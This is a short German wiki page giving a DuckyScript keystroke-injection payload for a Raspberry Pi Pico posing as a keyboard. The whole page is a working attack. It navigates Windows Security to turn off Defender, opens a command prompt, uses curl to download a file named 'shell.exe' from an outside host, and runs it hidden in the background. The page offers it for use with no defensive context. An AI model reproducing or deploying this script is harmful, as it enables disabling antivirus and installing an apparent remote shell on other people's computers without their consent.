Raspberry pico Payload

Aus xinux.net
Zur Navigation springen Zur Suche springen
  • Payload in DuckyScript geschrieben
DELAY 3500
REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard"
DELAY 1000
REM disable windows defender, you may have to fiddle with this 
CTRL ESC
DELAY 1000
STRING windows-sicherheit
DELAY 1000
ENTER
DELAY 3000
ENTER
TAB
TAB
TAB
TAB
DELAY 300
ENTER
DELAY 600
SPACE
DELAY 600
LEFT
ENTER
DELAY 300
ALT F4
GUI r
DELAY 2000
STRING cmd
DELAY 600
ENTER
DELAY 600
STRING curl https://download.tcpdump.de/download/shell.exe --output shell.exe
ENTER
DELAY 2000
STRING START /b shell.exe
ENTER
DELAY 200
ALT F4